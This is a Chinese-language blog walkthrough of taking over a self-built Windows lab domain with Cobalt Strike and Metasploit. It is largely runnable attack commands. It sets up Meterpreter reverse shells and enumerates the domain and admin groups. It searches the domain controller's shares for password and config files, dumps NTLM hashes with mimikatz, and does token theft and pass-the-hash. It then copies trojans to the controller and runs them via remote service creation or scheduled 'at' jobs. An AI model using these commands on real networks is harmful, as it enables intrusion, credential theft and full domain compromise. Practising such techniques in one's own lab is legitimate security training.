categories:
- 知识积累
top: FALSE
copyright: true
abbrlink: 1643719980
date: '2021-8-7 12:00:00'
description:1400x780
tags:
- 内网渗透
- 提权
- 渗透测试
- 黑客工具
photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png
前言
- Cobalt Strike的基础使用,自建的域控,就一台用
搭建好了域控机
目标:
1、一台2008R2的DC 192.168.136.133
2、一台2003 server的域内机器 192.168.136.136
3、一台2008R2的B2 192.168.136.138
内网渗透拿域控
kali 192.168.1.104
一、cs上线
①直接用web传递发现失效了,原因是2003居然没有powershell,那就传马,由于cs马传上去无法运行,所以就用msf马监听拿到shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run
②接着就将会话转给cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 80
run
二、cs派生会话
首先把它派生会话smb,可以绕防火墙
三、cs的命令使用以及信息收集
1、查看当前用户组
shell whoami/groups
2、查看域
shell net view /domain
3、枚举域内主机
shell net view /domain:GYLQ
4、查看DC的ip
shell ping WIN-NQ8TV3JGSN1
接着我发现2003机子太low了,再添加一个2008的机子域内机子继续下面的测试,直接web传递,可以直接上线,server2008
5、查看域内成员
shell net group "domain Computers" /domain
6、查看DC域控主机
shell net group "domain Controllers" /domain
shell nltest/dclist:GYLQ #也可以
7、查看域的信任关系
shell nltest /domain_trusts
8、导入了powershell的模块powerview.ps1的使用
powershell Invoke-ShareFinder #查看共享的
9、cs的列举域控命令
net dclist
net dclist /domain
10、列出共享cs命令
net share \\B1
11、判断是否能访问域控机的C盘,所以是域超级管理员
shell dir \\WIN-NQ8TV3JGSN1\C$
12、查看域内的管理员
shell net group "enterprise admins" /domain
13、域内的超级管理员
shell net group "domain admins" /domain
14、查看域内组中的超级管理员
shell net localgroup "administrators" /domain
15、cs中的查看管理员组的信息
net group \\WIN-NQ8TV3JGSN1
16、查看远程的DC的管理员用户
net localgroup \\WIN-NQ8TV3JGSN1 administrators
17、powerview模块的命令查看用户
powershell Get-NetLocalGroup -HostName WIN-NQ8TV3JGSN1
18、单靠命令搜索用户,或者信息收集
1、查看登陆过的用户
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\users
2、查看敏感文件
shell dir /S /B \\WIN-NQ8TV3JGSN1\C$\"*pass*" "*user*" "*config*" "username.*" "password.*"
3、winrm执行powershell
列举C盘目录
powershell Invoke-Command -ComputerName WIN-NQ8TV3JGSN1 -ScriptBlock{ dir c:\}
19、通过mimikatz抓取主域的NTLM
msv :
[00000003] Primary
* Username : B1$
* Domain : GYLQ
* NTLM : ccf1ceaea1d47a0948e5022bd4d7ae64
* SHA1 : 0ea509056cd0d8ab09f6deeec8ba2db643bae89e
四、内网登陆认证
1、制作token访问域控
steal_token 2688 域控的超级管理员pID
rev2self 恢复原来的令牌
就可以访问域控的盘符
2、制作令牌
3、hash认证
pth GYLQ\Administrator 285deb0940e1630b59d2cd9590fcbc91
五、黄金票据
需要:用户、域名、域id krbtgt的hash
1、查看当前黄金票据
shell klist
2、获取域SID
shell whoami/user
用户名 SID
================ ===========================================
b1\administrator S-1-5-21-204603982-2387576990-164658498-500
3、清除当前票据
kerberos_ticket_purge
六、内网横向渗透获取权限
方法一
1、生成一个服务木马为test.exe
然后上传到windows/users/administrator里面
2、将其复制到域控机内的temp中的命令,然后命名为a1.exe
shell copy C:\Users\administrator\test.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a1.exe
3、然后创建一个服务为a1
shell sc \\WIN-NQ8TV3JGSN1 create a1 binpath= c:\windows\temp\a1.exe
4、接着执行刚刚创建的服务a1
shell sc \\WIN-NQ8TV3JGSN1 start a1
5、接着域控的机子上线CS的system权限
方法二
这次会比较简单一些,就是定时执行文件
还是创建一个木马
1、然后保存为a2.exe,按照上面同样的命令复制到域控机内
shell copy C:\Users\administrator\a2.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a2.exe
查看是否上传成功
shell dir \\WIN-NQ8TV3JGSN1\C\windows\temp
2、查看域控当前时间
shell net time \\WIN-NQ8TV3JGSN1
3、接着利用at来创建一个一分钟执行木马的计划
shell at \\WIN-NQ8TV3JGSN1 12:58:39 C:\windows\temp\a2.exe
cs上线了
方法三
上面做了个总结,下面是域控机无法联网的情况怎么办
1、这是用中转器来进行获取域控
2、接着生成一个a3.exe木马,返回beacon到刚刚创建的监听器
3、将a3.exe木马上传到users\administrator目录中
4、然后下面命令将木马复制到域控机内
shell copy C:\Users\administrator\a3.exe \\WIN-NQ8TV3JGSN1\C$\windows\temp\a3.exe
查看是否复制成功
shell dir \\WIN-NQ8TV3JGSN1\C$\windows\temp
5、查看当前时间和定时执行木马
shell net time \\WIN-NQ8TV3JGSN1
shell at \\WIN-NQ8TV3JGSN1 13:27:43 C:\windows\temp\a3.exe
6、等到了我们定好的时间,不出网域控会smb形式上线
结果图
我的个人博客
孤桜懶契:http://gylq.gitee.io